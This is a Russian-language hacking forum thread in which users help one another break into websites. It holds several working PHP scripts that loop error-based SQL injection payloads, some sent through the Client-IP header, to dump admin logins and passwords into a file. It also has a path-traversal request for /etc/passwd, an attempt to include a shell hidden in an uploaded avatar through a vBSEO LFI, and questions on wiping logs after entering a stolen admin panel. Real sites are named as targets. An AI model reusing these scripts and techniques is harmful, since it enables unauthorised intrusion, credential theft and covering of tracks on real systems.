спасибо, но предпочитаю chrome браузер. А на счет вопроса, то уже нашел решение: http://chxo.com/scripts/hex2string.php
Ребят,неужели никто не знает sql-dumper'a,который поддерживает иньекции в хэдере... Нужно сдампить мыло:пасс с error-based скули в хэдере "client-ip"... мб,возможно какой-то скрипт набросать... буду очень благодарен за любую помощь
здравствуйте, есть sql инъекция, через которую вынул логин и пароль админа. Нашел администраторскую панель, а заходить туда боюсь, т.к. логи спалят. Какие есть способы пролезть в админку чтобы не попасть в логи, либо как их можно потом стереть? у меня ОС linux fedora, по этому не знаю здесь местные тулзы для подключения к проксе, не подскажите?
rSaUnDumper последней версии,к сожалению,тоже не справился...( неужели ни у кого не завалялся такой скрипт,простой дамп по лимиту?)
как то писал скрипт на пхп парсер по лимиту, и запускал на шеллах, щас потерялся, но как идея работает на верняка... P.S: Вот нашел у себя сырой скриптик, тебе его только под свою скулю сделать и все, конечно же возможны баги... PHP: <? set_time_limit (0); $limit='3';//до какого лимита $limit1='0'; //от какого лимита $filename = 't.txt'; echo "<font color=blue><b>Стартанул перебор лимита:</b></font><br>"; echo $filename."<br>"; while ($limit1++<$limit) { echo $limit1.'<br>'; $content = file_get_contents("http://localhost/index.php?productID=728'+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,U_ID,U_PASSWORD)+from+WBS_USER+limit+".$limit1.",1),1,63)+,+FLOOR(RAND(0)*2)))+--+"); $id = "#Duplicate entry(.*) for key 1#U"; preg_match_all($id,$content,$result); $idd=$result[0]; $file = fopen($filename,"a+"); fwrite($file, $limit1.$idd[0]."\n"); fclose ($file); echo $limit1.$idd[0]."<br>"; } echo "<font color=green><b>БД слита!</b></font>"; ?>
Не возможно пойти назад. http://site.ru/nastroyki.php?a=igry_java&id=../../../../../../../../etc/passwd Есть альтернатива обратному пути? То есть символу ../
winstrool, ему надо, чтоб в хидерах. PHP: <? // By Ereee set_time_limit(0); $start = 0; //начало $end = 1000; //конец $file_to = 'data.txt'; for($i=$start;$i<=$end;$i++) { $inject="and(select+1+from(select+count(*),concat((select+concat(0x7c7c7c,table_name,0x7c7c7c)+from+information_schema.tables+limit+$i,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+E"; //раскрученная скулья, точнее часть. Если изменить, не забудь limit 0,1 заменить на limit $i,1 $init = curl_init(); curl_setopt($init, CURLOPT_URL,"http://nasa.gov"); // URL curl_setopt($init, CURLOPT_RETURNTRANSFER, 1); curl_setopt($init, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($init, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($init, CURLOPT_HTTPHEADER, array('CLIENT-IP: '.$inject)); //Header Client-Ip $source = curl_exec($init); curl_close($init); preg_match("#|||(.*)|||#", $source, $data); file_put_contents($file_to,$data[1]."\r\n",FILE_APPEND); } //P.S. Писал нуб в PHP :) ?> Так? Не?
спасибо Ereee,winstrool за предоставленные скрипты вариант Ereee дампит пустые строчки,мб ошибка в... ? Code: preg_match("#|||(.*)|||#", $source, $data); очень хотелось бы sqlmap'ом,удобная тулза...но как я ни старался,проверял при level=5 и risk=3,указывал параметр "client-ip",добавлял --headers="client-ip: *" - sqlmap не находил скулю...он проверяет куки,юзер-агент,реферер,хост,но не client-ip...погуглил,похоже что поддержки иньекций в других хэдерах ещё нет(
Исправил код Ereee, теперь все работает проверял на себе PHP: <?php error_reporting(E_ALL); set_time_limit(0); $start = 0; $end = 10; $file_to = 'data.txt'; for($i=$start;$i<=$end;$i++) { $inject="'and(select 1 from(select count(*),concat((select table_name from information_schema.tables limit ".$i.",1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'"; $init = curl_init(); curl_setopt($init, CURLOPT_URL,"http://site.com"); curl_setopt($init, CURLOPT_RETURNTRANSFER, 1); curl_setopt($init, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($init, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($init, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($init, CURLOPT_HTTPHEADER, array("client-ip: ".$inject)); $source = curl_exec($init); curl_close($init); preg_match("#Duplicate entry '(.*)' for key#", $source, $data); file_put_contents($file_to,$data[1]."\r\n",FILE_APPEND); } ?>
в vbseo есть LFI, вида: Code: vbseo.php?vbseoembedd=1&vbseourl= Загрузил на форуме аватар(внутри шелл), пытаюсь заинклюдить: Code: vbseo.php?vbseoembedd=1&vbseourl=avatars/users/38290.gif Показывает просто напросто саму картинку Попробывал с нулл байтом: Code: vbseo.php?vbseoembedd=1&vbseourl=avatars/users/38290.gif%00.php Выдает ошибки: Code: Warning: require(38290.gif) [function.require]: failed to open stream: No such file or directory .../public_html/forum/vbseo.php on line 1544 Fatal error: require() [function.require]: Failed opening required '38290.gif' (include_path='.:/usr/local/lib/php') iny .../public_html/forum/vbseo.php on line 1544
Учите матчасть Уважаемый прежде чем задавать подобные вопросы. Во первых: Необходимо убедиться что после залития аватарки PHP код внутри файла сохранился в целостности. Собственно ,скорее всего, картинка сконвертилась или рекодилась в результате чего код `побился` и естественно не выполняется при выполнении остальных условий инклуда.
Ребят, не знаю за что удалили мой пост, ведь я не просил никого ничего ломать - я попросил помочь мне, обьяснить почему не работают мои запросы, ведь я просто хочу разобраться. Впредь если мой пост удалят по несоответствию с правилами - напишите мне хотя бы в личку ответ. Спасибо заранее. На страничке http://footquest.poltava.ua/players в строке поиска скуль иньекция. Я пытался делать различные запросы но скорее всего передающиеся данные в запросе в скобочках. Как это обойти подскажите плс.